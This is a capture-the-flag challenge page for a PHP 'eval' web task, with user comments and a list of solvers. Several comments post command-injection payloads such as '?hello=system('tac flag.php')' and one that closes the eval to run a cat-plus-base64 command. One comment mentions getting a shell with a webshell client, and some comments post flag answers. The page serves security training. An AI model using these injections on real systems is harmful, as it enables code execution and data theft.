evalWEB 未解决

分数: 15 金币: 1
题目作者: harry
一  血: moren448
一血奖励: 1金币
解  决: 20348
提  示:
描  述:
eval
评论
HK1ng 1年前

这里看了下面的评论,一直没搞懂为什么不用cat flag.php,然后我实验了一下,发现不直接显示内容,而是显示?>,但是如果右击查看源码就能发现flag的内容,而tac flag就能在页面直接看到flag,这是因为,当浏览器识别到<?php,就自动把它当作是未闭合的 PHP 标签,就会将其隐藏,而如果反转一下<?就识别不出来,就会当成是字符串输出。

回复 6
一个姓⎝李⎠的师傅~ 1年前

@Gargantua 因为浏览器遇到 <?php 这种特殊非 html 标准标签时,会触发浏览器自己的容错机制,把 php 代码字符串用灰色字符保留下来再源码中,但是不会当做字符串显示在浏览器上,更不会执行!

回复 0

Gargantua 1年前

这是什么原因呢?是不是因为浏览器将php代码执行了啊

回复 0

zhwen 1年前

代码闭合并执行命令,GLOBALS); system('cat flag.php|base64'

回复 0

650907784qqcom 1年前

flag{***}

回复 0

flag你在哪>︿< 1年前

flag{*********}

回复 0

八一卜kod 1年前

Too Young Too Simple

回复 1

evira 1年前

温馨提示(但不是正解):这个题可以尝试一下用菜刀去shell

回复 0

BaiBaiWin 1年前

http://114.67.175.224:16319/?hello=system('tac flag.php')

回复 2

1215125613 1年前

flag{1e6d67d7cec2d7d4c373db2605f5f4a1}

回复 0

Wang_Micro 1年前

flag{771f65b0a99e6ebb383759a6d4e34c8a}

回复 0

Rmgcc 1年前

?hello=system('tac flag.php')

回复 3

WriteUp

image
harry

1 金币

评分(13)

解题动态

小白修炼日常 攻破了该题 29分钟前
tafeishi 攻破了该题 1小时前
diandianying 攻破了该题 21小时前
amuliang1 攻破了该题 23小时前
恣睢 攻破了该题 1天前
xiaoqixy1 攻破了该题 1天前
lonely_wolf 攻破了该题 1天前
soymilk 攻破了该题 1天前
gedeer 攻破了该题 2天前
ysjy 攻破了该题 2天前
cholmon 攻破了该题 2天前
ling_x 攻破了该题 2天前
Anos 攻破了该题 3天前
15369226763 攻破了该题 3天前
人生1234 攻破了该题 3天前
asasehotaru 攻破了该题 3天前
wwwwander 攻破了该题 4天前
re_void 攻破了该题 4天前
wefyh 攻破了该题 4天前
16533261 攻破了该题 4天前
问题反馈